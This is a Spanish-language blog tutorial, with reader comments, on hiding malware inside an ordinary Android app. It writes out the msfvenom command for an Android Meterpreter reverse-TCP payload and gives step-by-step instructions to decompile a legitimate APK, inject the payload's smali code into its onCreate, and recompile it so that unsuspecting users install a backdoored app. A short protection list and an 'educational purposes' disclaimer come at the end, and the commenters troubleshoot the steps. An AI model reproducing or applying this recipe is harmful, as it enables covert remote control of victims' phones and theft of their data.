Hoy en día son muchas las personas que bajan aplicaciones para sus Smartphones desde Internet, esto con el objetivo de no pagar lo que vale una aplicación, obtenerla Full, o quizá la aplicación tiene algún "extra" que la hace mejor que la original.
Sin embargo los hackers pueden aprovecharse de tal cosa para meter sus aplicaciones maliciosas fusionadas con aplicaciones que parecen ser inofensivas.
En este post explicaré uno de los métodos que estos pueden usar para ocultar algún virus dentro de una APK común y corriente.
Necesario:
* Una apk maliciosa (Se hará en el primer paso).
* Una apk normal.
* Este software para descompilar apk, su descarga es aquí. (El software no es mio, muchos de los antivirus lo tomarán como un archivo de Malware, usarlo bajo su responsabilidad).
Proceso:
1) Crean el APK Malicioso.
Deberán crear el apk malicioso como se ha hecho en los tutoriales pasados con el comando:
msfvenom -p android/meterpreter/reverse_tcp lhost=[Su Ip Privada] lport=[Número mayor a 5000] R > /root/Escritorio/NombredelaAplicación.apk
NOTA: Donde pone /root/Escritorio, puede ser también /root/Desktop/ esto puede solucionar algún error de ubicación del archivo.
Luego de crear el archivo lo suben a un host de preferencia, en mi caso será Mega, esto es para pasarlo a Windows, donde le haremos unas modificaciones
2) Descompilar apk's.
Para eso debemos tener el programa descargado en una carpeta, y las aplicaciones, normal y aplicación de virus dentro de la carpeta 2-in.
Ahora abren el software y le dan en la opción descompilar (Opción 2), luego les aparecerán sus dos aplicaciones, la creada con el virus y la aplicación normal, vamos a descompilar las dos, así que primero le damos a Opción 1, y luego ponemos Y, y repetimos el proceso con la otra aplicación.
Ahora en la Carpeta 3-Out tendrán las dos aplicaciones descompiladas, ahora vamos a hacerles el trabajito.
3) Mover código.
Primero nos iremos a la carpeta de la aplicación infectada y copiaremos toda la carpeta llamada Metasploit, la encontraremos en /smali/com/ . y la pegaremos en la carpeta de la Aplicacion Normal.
Quedará así mas o menos:
4) Editar código.
Ya movida la carpeta entraremos en la misma, pasaremos por carpetas hasta encontrar MainActivity.smali lo abriremos con un editor, yo les recomiendo Sublime Text.
Copiaremos la Linea 10 y nos saldremos de ahí.
Ahora deberán buscar el mismo archivo MainActivity en la aplicación normal, en la que estoy usando en este tutorial está en esta carpeta.
Ahora vamos a editar ese archivo con el mismo Editor de Texto.
Dentro buscaremos con Crtl+F la palabra OnCreate, pegaremos el código que habíamos copiado debajo del SEGUNDO OnCreate que veamos, así como muestra la imagen.
Guardamos y ya estaría listo.
5) Recompilar aplicaciones.
Ya editada la aplicación, abriremos el Software y daremos a la Opción 3, y luego escogeremos la Aplicación "Normal" (Ya no es normal, porque editamos parte de sus archivos).
Elegiremos la Opción 4.
Ya recompilado nos iremos a la carpeta 4-Done ahí estará nuestra apk lista con el virus que creamos camuflado.
6) Listo!!
Ahí esa aplicación será instalada normalmente por las personas pero traerá regalito, se podrán hacer los procedimientos que se han hecho aquí en el Blog con anterioridad.
¿Cómo me protejo ante esto?
* Descargar Aplicaciones de páginas de reputación como Playstore.
* No descargar Keygens ni nada que necesite permisos extraordinarios.
* Tener sentido común.
* No instalar cualquier aplicación en el celular.
* Tener analizadores de aplicaciones antes y después de instalarse en el Smartphone.
IMPORTANTE!
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.
- Cuculmeca
gracias me sirvió mucho
ResponderEliminarDespués de escribir root/desktop/nombre.apk o root/escritorio/nombre.apk m sale q no existe el fichero o directorio
ResponderEliminarSólo pon el nombre.apk sin la ruta
Eliminardebe ser root/Desktop/nombre.apk o root/Escritorio/nombre.apk
Eliminarobserva que Escritorio y Desktop deben estar con Mayuscula al iniciar
Me funciona pero porque no la instala
ResponderEliminarno me sale la opción de la linea 10, directamente no hay linea 10 ayudame porfavor
ResponderEliminarIgual al crear la aplicación infectada y querer copiar la linea 10 no me aparece
ResponderEliminar